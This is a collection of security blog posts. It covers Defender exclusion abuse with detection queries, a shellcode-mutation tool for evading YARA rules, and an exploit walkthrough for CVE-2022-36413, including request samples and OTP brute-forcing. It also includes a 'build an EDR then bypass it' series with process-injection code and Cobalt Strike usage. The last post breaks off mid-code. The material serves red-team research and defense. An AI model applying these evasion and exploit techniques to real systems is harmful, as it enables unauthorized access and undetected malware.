Note that alerts will still be generated in Microsoft 365 Defender for this action because the endpoint detection and response (EDR) capability of Microsoft Defender for Endpoint is running and antivirus exclusions do not apply to it. Indeed, the purpose of EDR is to detect post-breach activities. Usually, EDR is set in block mode to remediate these post-breach detections when a non-Microsoft antivirus product is running.

EDR detection for SharpHound

Based on that, it seems that Disable Local Admin Merge does not allow us to prevent local admins from adding exclusions via PowerShell. Note that the same applies via WMI using the MSFT_MpPreference class. In fact, from what I observed during my testing, the created exclusions are overwritten when the device is restarted or when policies are pushed again. However, the exclusion did allow us to download and run SharpHound in the meantime.

Hide Exclusions From Local Admins

The last feature that I wanted to talk about is the Hide Exclusions From Local Admins setting. This setting is not available in the Microsoft Defender Antivirus profile yet, but it can already be configured with a custom configuration profile or with a Group Policy, for example. When enabled, exclusions are no longer visible to administrators in PowerShell, Windows Security or the Registry Editor.

It can be configured using the following registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\HideExclusionsFromLocalAdmins.

Hide exclusions from local admins registry key

If the value is set to 1, as is currently the case, it blocks all access to exclusions for administrators, as shown below:

  • Registry Editor:
Exclusions in Registry Editor can’t be accessed
  • Windows Security application
Exclusions in Windows Security can’t be accessed
  • PowerShell
Exclusions can’t be accessed using Defender PowerShell cmdlet
Exclusions can’t be accessed by browsing registry keys in PowerShell

However, it does not block admins from adding exclusions; it only blocks them from viewing them.

Detection

At the time of writing, there is currently no method to block administrators from adding exclusions. As a general guidance, it is a best practice to avoid granting local administrator permissions to users on their machine. However, it might not always be possible for multiple reasons. In this case, it might be interesting to implement detection measures.

In the Microsoft 365 Defender portal, custom detection rules can be created to detect and alert when such events occur. Moreover, if Microsoft Defender for Endpoint events are connected in Microsoft Sentinel, an analytics rule could also be created. We will focus on creating a custom detection rule in Advanced Hunting in the Microsoft 365 Defender portal as part of this blog post.

When adding an exclusion in Microsoft Defender Antivirus, a registry key is created. Therefore, we can query the DeviceRegistryEvents with the following Advanced Hunting query:

DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

However, during my tests I noticed that exclusions configured in Intune are pushed again every time a device is restarted, which would generate a lot of false positives. To prevent that, the legitimate exclusions can be listed in the query to make sure the rule only triggers on non-legitimate exclusions:

let exclusions = dynamic ([
"C:\\myapp",
"myapp.exe",
".app"
]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey has "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"
| where RegistryValueName !in (exclusions)

A custom detection rule can be created based on the DeviceId, and rule properties, such as response actions, can be specified to help investigation and remediation activities.

Conclusion

As we have seen during this blog post, it is currently not possible to block administrators from adding exclusions in Microsoft Defender for Endpoint. If local administrators are required on devices, detection mechanisms can be implemented to make sure your security operations teams have visibility on such events.

About the author

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security, where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products. Additionally, Guillaume has recently gained an interest in DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

You can find Guillaume on LinkedIn.

Avoiding Detection with Shellcode Mutator

By: Rob Bone
21 December 2022 at 09:00

Today we are releasing a new tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.

Download Shellcode Mutator

GitHub: https://github.com/nettitude/ShellcodeMutator

Background

One of the main benefits of writing your shellcode in assembly is that you have full control over the structure of the shellcode.

For example, the content and order of the functions in the source file can (obviously) be changed and the code compiled to produce a new version of your shellcode. These changes don't have to be functional, however; we can use automated tools to mutate the shellcode source so that each time we compile it the functionality stays the same, but the contents change.

This then means that the resultant shellcode will have a different size, file hash, byte order etc, which will make it harder to reliably detect both statically and in memory.

This ability is orthogonal to shellcode encryption etc, as at some point encrypted and encoded shellcode needs to be decrypted and decoded and descrambled so that it can actually be executed, and at this point it may get detected.

Let’s make use of a concrete, if a little contrived, example.

Test Case

We can take the nasm source code for some MessageBox shellcode from Didier Stevens, compile it as per his instructions and inject it and we successfully get a message box – so far so good.

Testing the default shellcode.

If we were to extract this shellcode as a blue teamer and want to write detections to catch it, we may note the hash, examine the contents and the disassembly and then write a yara rule to be able to catch it in memory or on disk.

As shown below, we can take a quick peek at the binary using binary refinery.

Taking a quick peek at the binary using binary refinery.

We also note the sha256 hash is a8fb8c2b46ab00c0c5bc6aa8d9d6d5263a8c4d83ad465a9c50313da17c85fcb3.

Rizin can be used to examine the shellcode disassembly.

Examining the shellcode disassembly using rizin.

If we were to write a very quick yara rule for this, we may choose to focus on the initial bytes which perform some setup. Replacing the offsets (e.g. [rbx + 0x113]) with wildcards and taking the bytes up to the second call at 0x0000001b we can write a quick yara rule that matches the shellcode in memory and on disk, but nothing else in e.g. C:\Windows\System32 (testing for false positives).

A quick-and-dirty yara rule for the shellcode.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

So we have a reliable yara rule and add it to our threat hunts, all good right?

Shellcode Mutator

This is where the Shellcode Mutator project comes in. This simple Python script will parse nasm source code and insert sets of instructions that ‘do nothing’ at random intervals, altering the byte order and file hash of the shellcode at the cost of increased size.

The script is easy enough to use, taking a source code ‘template’, an out file, a morph percentage and a flag to set x86 vs x64 mode.

Help text for shellcode mutator.

This script has some basic logic to check source lines, but essentially it has two sets of instructions that can be expanded upon, one for x86 and one for x64. Each entry in these instruction sets should, after all its instructions have executed, leave all registers and flags in the same state as before they were executed, to ensure that the shellcode can continue without erroring.

The default "no instructions" sets.

Along with some other logic, the script will place these instruction sets at random intervals (dictated by the morph percentage) before the instructions specified in the assembly_instructions variable:

Instructions that are used as triggers for the mutations.

If we run the script against our MessageBox shellcode, setting a morph percentage of 15% we get a source code file that is 57 lines instead of 53. Compiling that shellcode and executing the yara search shows that it is not caught and only the original shellcode matches.

The mutated MessageBox shellcode no longer matches our yara rule.

Examining the disassembly of the binary file shows that it has inserted a nop (0x90) instruction into the bytes that we matched upon (in addition to other places). This of course also changed the file hash.

The instruction that caused our yara rule not to match.

There is an element of luck of course. We need to make sure that we change enough bytes that any yara rules will no longer match without actually knowing what those yara rules are (or any other detections). Increasing the morph percentage then will increase the number of alterations made and the likelihood of bypassing any rules at the cost of increased shellcode size.

Of course the big question is, does our shellcode still run?

Testing the morphed shellcode still works!

Winning!

Download Shellcode Mutator

GitHub: https://github.com/nettitude/ShellcodeMutator

References

The post Avoiding Detection with Shellcode Mutator appeared first on LRQA Nettitude Labs.

CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus

By: Skay
10 March 2023 at 15:12

I. Component Overview

1. Keywords

AD, cloud applications, single sign-on (SSO)

2. Overview

ZOHO ManageEngine ADSelfService Plus is an integrated self-service password management and single sign-on solution for Active Directory and cloud applications from ZOHO Corporation. It allows end users to perform tasks such as password resets, account unlocks and profile information updates without relying on the help desk. ADSelfService Plus provides self-service password reset/unlock, password expiration reminders, a self-service directory updater, a multi-platform password synchronizer and single sign-on for cloud applications.

3. Usage Scope and Industry Distribution

Enterprises of all sizes that use Windows domain management internally.

II. Environment Setup and Dynamic Debugging

1. Environment Setup

Download links for each version are available below; just download the exe for a one-click installation:

https://archives.manageengine.com/self-service-password

After installation, the default username/password is admin/admin, and the service is accessible on port 8888.

2. Dynamic Debugging

Modify the conf/wrapper.conf file and add the JDWP debugging parameters.

Debugging is now working.

The component's web service is started by Tomcat (Tomcat version xxx). The startup script is bin/runAsAdmin.bat and the main configuration file is \conf\wrapper.conf, which sets the various startup parameters. The final, fully resolved startup command line is as follows:

"..\jre\bin\java" -Dcatalina.home=.. -Dserver.home=.. -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=10010,server=y,suspend=n -Duser.home=../logs -Dlog.dir=../logs -Ddb.home=../pgsql -Dcheck.tomcatport="true" -Dproduct.home=.. -DHTTP_PORT=8888 -DSSL_PORT=9251 -Dfile.encoding=UTF-8 -Djava.io.tmpdir=../temp -XX:OnOutOfMemoryError="SetMaxMemory.bat" -Dhaltjvm.on.dbcrash="true" -Dorg.apache.catalina.SESSION_COOKIE_NAME=JSESSIONIDADSSP -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -XX:-CreateMinidumpOnCrash -Dmail.smtp.timeout=30000 -Dorg.apache.catalina.authenticator.Constants.SSO_SESSION_COOKIE_NAME=JSESSIONIDADSSPSSO -Xms50m -Xmx256m -Djava.library.path="../lib/native;../jre/lib" -classpath "略" -Dwrapper.key="PIskDhkG89EFqv0f0ijb69bgHwHC9ybE" -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=2884 -Dwrapper.version="3.5.35-pro" -Dwrapper.native_library="wrapper" -Dwrapper.arch="x86" -Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1 -Dwrapper.lang.domain="wrapper" -Dwrapper.lang.folder="../lang" org.tanukisoftware.wrapper.WrapperSimpleApp com.adventnet.start.ProductTrayIcon conf/TrayIconInfo.xml StartADSM

The startup entry method is com.adventnet.start.ProductTrayIcon#main; the startup process will not be analyzed in detail here.

Routing

The starting point is web.xml. After going through it, the routes can be roughly classified as follows:

/RestAPI/ => org.apache.struts.action.ActionServlet

/api/json/ => com.manageengine.ads.fw.api.JSONAPIServlet

/ServletAPI/* /RestAPI/WC/Clustering/* /RestAPI/Clustering/* /m/mLoginAction

/m/mSelfService /m/mMFA => com.manageengine.ads.fw.common.api.ServletAPI

as well as some servlets configured individually in web.xml.

Authentication

For this vulnerability, the analysis focuses on the RestAPI.

In web.xml, authentication is only configured for the /RestAPI/WC/* route; the other routes have no such configuration.

The RestAPI-related checks are handled in the ADSFilter global filter, which determines whether the request targets a RestAPI route; if so, the request enters com.manageengine.ads.fw.api.RestAPIFilter#doAction, where different validation logic applies.

The core RestAPI validation logic lives in RestAPIFilter, while the more specific rules are stored in the database:

select * from ADSProductAPIs

The APIs roughly fall into these categories: requiring a session, requiring a HANDSHAKE_KEY, and requiring no authentication.

Other Security Mechanisms

security.xml

This file lists each API's parameters (type, length, regex), request method, whether CSRF protection is required, and so on.

IV. CVE-2022-36413

Zoho ManageEngine ADSelfService Plus supports third-party login methods; the prerequisite is that an identity verification database has been configured in the back end:

http://192.168.33.33:8888/webclient/index.html?#/configuration/selfservice/idm-applications

The authentication bypass again leverages the RestAPI. We know that RestAPI authentication is handled in the ADSFilter global filter, which determines whether the request targets a RestAPI route; if so, the request enters com.manageengine.ads.fw.api.RestAPIFilter#doAction for the actual permission checks.

Whether an interface requires authentication is stored in PostgreSQL:

select * from ADSProductAPIs

Fortunately, we found three unauthenticated interfaces that allow us to complete this arbitrary password reset.

Step 1: PM_INITIALIZE_AGENT

POST /RestAPI/PMAgent/****** HTTP/1.1
Host: 192.168.33.133:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Time:1656925239
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.33.133:8888/webclient/index.html?
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
 
something

Some of the parameters here need to be specially constructed. First is the timestamp, which is easy enough to deal with.

Next is machineName, which is easy to obtain if we are in the target domain. PS: the domain name can be obtained without logging in.

Then there is the otp parameter: it is a six-digit number, so it is easy to brute force. The validation logic for this parameter is in com.manageengine.adssp.server.api.authorization.PasswordSyncAgentAPIAuthorizer#verifyAgent: if ((new Date()).getTime() / 1000L - requsetTime < 300L && requsetTime - (new Date()).getTime() / 1000L < 300L)

This gives us a five-minute window for brute forcing.

Brute-force protection is implemented in com.adventnet.iam.security.DoSController#controlDoS.

With the timestamp kept unchanged, each IP address can send 1,000 requests: 100000/1000 = 100.

In summary, we can obtain the otp parameter within an acceptable amount of time, and with a cloud service provider like Amazon or Google it is actually quite easy. A full attack running through one million codes would cost about 150 USD.

A real-world example of such an attack is described here: https://thezerohack.com/hack-any-instagram

We successfully obtain the password encryption/decryption key.

Step 2: PM_PASSWORD_SYNC

POST /RestAPI/PMAgent/****** HTTP/1.1
Host: 192.168.33.33:8888
Time:1657012207
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/2010101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
REMOTE_USER_IP:127.0.0.1
ZSEC_PROXY_SERVER_NAME:aaa
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
X-Forwarded-For:127.0.0.1
Referer: http://192.168.33.33:8888/webclient/index.html?
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
 
otp=294608&operation=passwordSync&username=254,147,58,204,126,202,25,240,150,20,124,148,236,167,85,25,16&machineName=TEST-DC-01.test.com&password=254,147,58,204,126,202,25,240,150,20,124,148,236,167,85,25,16&time=165512621862411&PRODUCT_NAME=nnn&domainName=test.com&machineFQDName=TEST-DC-01.test.com

To reset the username and password we can go through the PM_INITIALIZE_AGENT operation, but the username and password need to be encrypted first.

The application implements AES encryption by dynamically loading a DLL, so decryption requires some extra work. By analyzing ManageEngineADSFramework.dll, we can construct the encrypted username and password locally.

The username and password are successfully changed.

V. References

https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-36413.html

Lets Create An EDR… And Bypass It! Part 1

By: CCob
27 May 2020 at 18:50

I initially intended to write a blog post on bypassing EDR solutions using a method I have not seen before. But after some thought about how I would demonstrate this, I decided to actually create a basic EDR first. Hopefully this will share some insights into how they work, in addition to methods of bypass.

There are a range of methods that Anti Virus and EDR solutions use to detect malicious programs or behaviors.

Signature Detection

As the name implies, signature detection is the process of analyzing the signatures of files for known malware previously seen before. This can be something as simple as comparing a SHA1 hash of a file with a known database of malware. Generally signature detection is implemented at kernel level using file system filters. For example, Microsoft have a specific technology built into Windows for this very purpose. Files are scanned during the opening phase and if the file is deemed malicious, the filter driver will block access to the file from the calling application. Signature detection is usually the first line of defense employed by AV’s and EDR’s.

Sandboxing

If signature detection fails to stop the latest and greatest malware from running, the EDR's next line of defence is sandboxing. Prior to allowing any executable to run, EDR's will run the potentially malicious program inside a virtual machine. Not the kind we run our own virtual machines inside, but one designed to analyze program flow and look for known malware through dynamic analysis. Some vendors claim to have special AI engines that analyse program flow etc., so how these are implemented is somewhat of a black box. I personally believe they are done through control flow graph (CFG) analysis. The advantage of CFG analysis is that re-compilation of binaries or other small changes will still produce the same CFG, even though the resulting executable is different. Whilst the EDR sandbox is a decent line of defence, it can succumb to various bypasses.

The first is time. The virtual machine will only spend a finite amount of time analyzing executables. So if there is enough complexity in the program being virtualized, eventually the sandbox will give up if it hasn’t found the binary to be malicious in nature in that time.

The second bypass method that is commonly used to thwart the sandbox is breaking up control flow to prevent further analysis. As mentioned earlier, the sandbox is essentially a virtual machine, but there will be certain OS API calls that it cannot really virtualize successfully. When this occurs, the sandbox will not be able to carry on analyzing program flow and generally gives up and lets the program continue on its merry path.

Active Protection

The next stage of protection employed by these solutions is something I call active protection. Different products market this under different names. It’s generally implemented through loading a DLL into each process and implementing API function hooks (more on this later) to analyse and monitor for suspicious behaviors that are not generally found when running benign programs.

A simplified version of active protection is what I will be looking to implement as part 1 of this series. In part 2 I'll cover bypassing this method using a technique I've not seen used before, but with the same ultimate goal: making the malware's API calls invisible to the active protection.

Event Tracing

I’d be remiss if I did not mention event tracing. All the methods above are proactive forms of protection, designed to stop malware from executing. Event tracing is the reactive component to an EDR’s arsenal. When all proactive protections have failed, event tracing is used to analyze a series of events that have occurred and tie these to behaviors found when executing malware. Some of you maybe familiar with sysmon, and essentially EDR vendors implement their own implementation of sysmon to achieve the same goals.

So with the various methods covered, let's dive in.

SylantStrike

Welcome to SylantStrike, the most sophisticated open source Windows EDR solution available on the market…. hmm, well, not quite.

OK, so as mentioned earlier in the article, the area that we will be looking to implement in our super cool EDR solution is the active protection component. Generally this is implemented using function hooks. So what is a function hook? A function hook is essentially a method of changing the behavior of a pre-existing API by redirecting execution of the function to user controlled code.

Take a look at the jsfiddle below. We essentially replace the default window.alert function and add some custom behavior to it. The concept is no different to this.

It would be awesome if native APIs could be replaced as easily as in the fiddle above, but at a native level it's a little more complex. Hooking native APIs involves patching the first instruction of the API we are looking to intercept with a JMP instruction to our intercepted version of the API call. If you are interested in more technical details regarding native inline function hooks, head over to MalwareTech's blog, he has a great post describing Inline Hooking.

Luckily for us there are an array of libraries already available that make the hooking process a breeze. Check out the listing here on GitHub for some of the libraries available.

For SylantStrike I decided to go with MinHook. It supports both x86 and AMD64 architectures and is fairly minimal in terms of source files to include into our uber cool EDR solution.

Active Protection DLL

Now that we have decided on a hooking library, lets take a look at our basic DLL entry point for implementing our active protection DLL. The active protection is implemented as a DLL since it will eventually be loaded into all of the processes we are looking to protect.

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"

#include "minhook/include/MinHook.h"
#include "SylantStrike.h"

DWORD WINAPI InitHooksThread(LPVOID param) {

    //MinHook itself requires initialisation, lets do this
    //before we hook specific API calls.
    if (MH_Initialize() != MH_OK) {
        OutputDebugString(TEXT("Failed to initalize MinHook library\n"));
        return -1;
    }

    //Now that we have initialised MinHook, lets prepare to hook NtProtectVirtualMemory from ntdll.dll
    MH_STATUS status = MH_CreateHookApi(TEXT("ntdll"), "NtProtectVirtualMemory", NtProtectVirtualMemory, 
                                           reinterpret_cast<LPVOID*>(&pOriginalNtProtectVirtualMemory));  

    //Enable our hooks so they become active
    status = MH_EnableHook(MH_ALL_HOOKS);

    return status;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {
        //We are not interested in callbacks when a thread is created
        DisableThreadLibraryCalls(hModule);

        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_PROCESS_DETACH:

        break;
    }
    return TRUE;
}

The DllMain function above is the entry point to our protection DLL. Whenever the DLL is loaded using the LoadLibrary API, the function is called automatically along with the DLL_PROCESS_ATTACH reason. The code then creates a separate thread to set up our hooked functions. Ideally we should do this inline and not within a separate thread, but there is very little that can be executed inside DllMain without creating deadlocks, so we delegate to a thread instead.

The responsibility of the InitHooksThread function is to initialise the MinHook library itself, setting up each individual function we are interested in hooking, then finally enabling the hooks.

One of the many API’s that EDR solutions will hook is the NtProtectVirtualMemory API. This function enables an application to change the memory protection options for a specific range of memory. Memory can be marked as read only (RO), read write (RW), read execute (RX) or read/write execute (RWX). RWX is what our trusty EDR solution will be looking for. RWX is seldom required for generic application code, but malware will quite often request this mode of protection due to the nature of how malicious code functions. A typical example is AMSI bypass. AMSI bypasses usually involve patching the AmsiScanBuffer API at runtime to change its behaviour to always return a clean result. This will usually involve a call to NtProtectVirtualMemory to change the memory protection from RX to RWX for a short period of time whilst the patch is applied. Ergo, an update of a memory range’s protection flags to RWX is what we are going to implement within our EDR.

// SylantStrike.cpp : Hooked API implementations
//

#include "pch.h"
#include "framework.h"
#include "SylantStrike.h"

//Pointer to the trampoline function used to call the original API.
//This will be initialised by MinHook during initialisation.
pNtProtectVirtualMemory pOriginalNtProtectVirtualMemory = nullptr;

DWORD NTAPI NtProtectVirtualMemory(IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PULONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection) {

	//Check to see if the calling application is requesting RWX
	if ((NewAccessProtection & PAGE_EXECUTE_READWRITE) == PAGE_EXECUTE_READWRITE) {
		//It was, so notify the user of naughty behaviour and terminate the running program
		MessageBox(nullptr, TEXT("You've been a naughty little hax0r, terminating program"), TEXT("Hax0r Detected"), MB_OK);
		TerminateProcess(GetCurrentProcess(), 0xdead1337);
		//Unreachable code
		return 0;
	}

	//No it wasn't, so just call the original function as normal
	return pOriginalNtProtectVirtualMemory(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection);
}

The hooked version of NtProtectVirtualMemory checks the NewAccessProtection flag to determine if the application is requesting the RWX protection level on the memory range. If RWX is requested then we simply alert the user to the suspicious activity and terminate the offending process. If RWX is not requested, the code simply calls the original NtProtectVirtualMemory API and returns the result.

And that is it, excluding third party code, in little more than 75 lines of code, we have implemented a very basic EDR solution that will terminate any program that tries to change the protection mode of any memory to RWX.

Injector

With the active protection DLL in place, we now need a way to have each process load the DLL on startup. SylantStrikeInject to the rescue: a C# program that will monitor for new processes and load our protection DLL into them. There are various ways EDR's will do this. Many will choose PsSetCreateProcessNotifyRoutine to monitor for process creation, but the drawback is that this API can only be used from within a driver, and since we are implementing a simple EDR, we don't want to go down that route. So instead we can use WMI to monitor for new process events.

       static void WaitForProcess()
        {
            try
            {
                var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ProcessStartTrace"));
                startWatch.EventArrived += new EventArrivedEventHandler(startWatch_EventArrived);
                startWatch.Start();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine($"+ Listening for the following processes: {string.Join(" ", processList)}\n");
            }
            catch (Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine(ex);
            }
        }

When a new process is launched, the startWatch_EventArrived function will be called with details of the process that has started.

       static void startWatch_EventArrived(object sender, EventArrivedEventArgs e)
        {
            try
            {
                var proc = GetProcessInfo(e);
                if (processList.Contains(proc.ProcessName.ToLower()))
                {
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.WriteLine($" Injecting process {proc.ProcessName}({proc.PID}) with DLL {dllPath}");
                    BasicInject.Inject(proc.PID, dllPath);
                }
            }
            catch (Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine(ex);
            }
        }

We then check that the process that has just started is on our list of names to inject our protection DLL into; after all, we don't want to inject everything for our demo EDR. If the process is on our list of processes to inject, the code calls BasicInject.Inject to handle the loading of the DLL into the foreign executable.

    public static int Inject(int pid, string dllName) {

        // geting the handle of the process - with required privileges
        IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid);

        // searching for the address of LoadLibraryA and storing it in a pointer
        IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

        // alocating some memory on the target process - enough to store the name of the dll
        // and storing its address in a pointer
        IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        // writing the name of the dll there
        UIntPtr bytesWritten;
        WriteProcessMemory(procHandle, allocMemAddress, Encoding.ASCII.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);

        // creating a thread that will call LoadLibraryA with allocMemAddress as argument
        CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);

        return 0;
    }

The inject code allocates a block of memory to hold the path to our protection DLL and writes the full path into the remote process’s memory space. The code also determines where the address of the LoadLibraryA function resides in memory. Once these steps have been performed, a thread is created in the remote process using the address of the LoadLibrary API call, and the thread parameter is the address of where the active protection DLL path exists in memory. Once the thread is created, the active protection DLL will be loaded by the remote process.

And we are done, we have our active protection DLL and C# loader ready to rock.

Demo

So first things first is to start SylantStrikeInject to monitor for process creation and inject the protection DLL. Process monitoring using WMI relies on administrative permissions, so SylantStrikeInject should be launched from an elevated command prompt. For this demonstration we are only interested in protecting notepad and calc.

.\SylantStrikeInject.exe --process=notepad.exe --process=calc.exe --dll=c:\tools\SylantStrike\SylantStrike.dll
Waiting for process events
+ Listening for the following processes: notepad.exe calc.exe

 Injecting process notepad.exe(22808) with DLL c:\tools\SylantStrike\SylantStrike.dll

Launching notepad will trigger the injection of SylantStrike and will protect notepad from any code that attempts to adjust memory protection to RWX.

Confirmation DLL loaded using ProcessHacker’s Modules list on notepad.exe

To confirm our protection is active and working I'm going to use the awesome Donut tool from @TheRealWover. Donut can convert multiple types of EXE/DLLs into position independent shellcode that can be injected into foreign processes.

 C:\Tools\donut\donut.exe -a 2 DemoCreateProcess.dll -c TestClass -m RunProcess -p "calc.exe"

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "DemoCreateProcess.dll"
  [ Entropy       : Random names + Encryption
  [ File type     : .NET DLL
  [ Class         : TestClass
  [ Method        : RunProcess
  [ Parameters    : calc.exe
  [ Target CPU    : amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"

The command above uses Donut’s DemoCreateProcess library which will attempt to launch a process. This is then converted into shellcode and stored inside a file called loader.bin

Our next step is to load the generated shellcode into our notepad process that is actively protected by SylantStrike. There are loads of methods available to inject shellcode into a foreign process but for this demonstration I’m going to use CobaltStrike.

Using the shinject beacon command, we choose our notepad PID and path to the donut generated shellcode.

Once the shellcode is loaded into notepad and begins executing, the malicious little blighter is stopped in its tracks by SylantStrike’s protection.

If you are interested in having a go yourself, head over to the SylantStrike repo on GitHub.

Conclusion

In this example here I am only demonstrating one particular function hook and suspicious behavior. In reality there are numerous API hooks and suspicious behaviours a fully fledged EDR will look out for.

In part 2 I will cover a few methods on how our new EDR solution can be bypassed, so until then, thanks for reading.

Acknowledgements

The post Lets Create An EDR… And Bypass It! Part 1 appeared first on Ethical Chaos.

Lets Create An EDR… And Bypass It! Part 2

By: CCob
14 June 2020 at 10:47

In part one of this series we created a basic active protection EDR that terminated any program that changed memory protection to RWX. This was accomplished by hooking the NtProtectVirtualMemory API and monitoring for the RWX memory protection flag. Check out part 1 of this series for a more detailed description on how this was done.

In part 2 I’m going to cover some bypass methods that I have seen others document and then demonstrate another method along with accompanying code.

OK, so with the introduction out of the way, let's look at the methods currently in use and the pros and cons of each bypass.

Blending in

The simplest of the methods doesn't involve any magic at all and is all about blending in. The EDR hooks remain in place but don't alert on any suspicious activity due to the implementation of the malware. A good example of bypassing our EDR from part 1 would be to ensure that you never change or allocate memory as RWX. If you need to allocate new code or update existing code, use RW mode first, then change to RX once the update is complete. If the code has no option but to behave in suspicious ways, it's time to look at bypass methods.

Unhooking

Unhooking the hooked API calls is another option. This involves reversing the operation that EDR's perform when patching the hooked APIs. Generally this involves loading a clean copy of the hooked DLLs from disk and overwriting the hooked functions' code. Typically this is only 5 bytes per hooked function. There are a few examples of how this can be done, but one such example can be found on the ired.team website. Unhooking could potentially be detected by EDR's during this process.

Direct syscall instructions

By far the most effective solution is direct syscall instructions. This is where the malware does not make calls to the API’s themselves but implements the same stub code that the lowest level API calls implement prior to transferring to kernel mode. Since no API calls are made prior to hitting kernel code, the EDR is blind to these types of calls. This is due to the fact that generally all EDR’s implement the active protection in-process within userland code, which inherently is their weakness.

Direct syscall bypass comes at a price though. It’s by far the hardest to get right and the most verbose in code terms. Since direct syscalls are utilising the lowest level of API’s there is a ton of boilerplate needed for some functions to be called correctly. Let’s take the higher level CreateProcess API. If you wanted to create a process using syscalls only, you probably need to implement somewhere in the region of 20-30 syscall implementations. Take a look at ReactOS’s implementation of CreateProcessInternal if you don’t believe me.

Another complication that comes from using direct syscalls is 32-bit processes running on 64-bit Windows. 32-bit programs actually switch to 64-bit mode prior to making the syscall and then back again when returning from kernel land. Syscall indexes can also change between versions of Windows: syscalls are implemented using a table within the kernel, with the index used to reference a particular syscall. This index can change, so again, it is something that needs to be considered.

I have seen some excellent work in this area recently that makes the process easier. Here are some great examples

Microsoft Signed DLL Process Mitigation Policy

Another method of bypassing EDR’s can be achieved by enabling the Microsoft Signed DLL Process Mitigation Policy. Wow, that’s a mouthful. The policy is designed to prevent any DLL that is not signed by Microsoft from loading into any process where the policy is enabled. This prevents EDR’s that have not been signed or cross-signed by Microsoft from loading into the process.

ired.team have covered this method in a blog post, and in fact it is the same solution implemented by Cobalt Strike's blockdlls command. The policy can be enabled in-process, but it does not affect DLLs that have already been loaded. This generally means it's only effective on child processes created by your malware. It's a simple solution to implement, but all bets are off if the EDR's active protection DLL is cross-signed by Microsoft, or if Microsoft themselves implement active protection EDR within the likes of Windows Defender ATP. The policy will also prevent the malware from loading other non-Microsoft DLLs that it may need to function.
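
For reference, here is a minimal C++ sketch of launching a child process with this policy via the extended startup attributes, which is essentially what blockdlls does; the target executable is just a placeholder and it assumes Windows 8 or later:

// blockdlls_sketch.cpp - launch a child with the "Microsoft signed only"
// binary signature mitigation policy applied.
#include <windows.h>
#include <cstdio>

int main() {
    STARTUPINFOEXA si = { { sizeof(si) } };
    PROCESS_INFORMATION pi = {};

    SIZE_T attrSize = 0;
    InitializeProcThreadAttributeList(nullptr, 1, 0, &attrSize);
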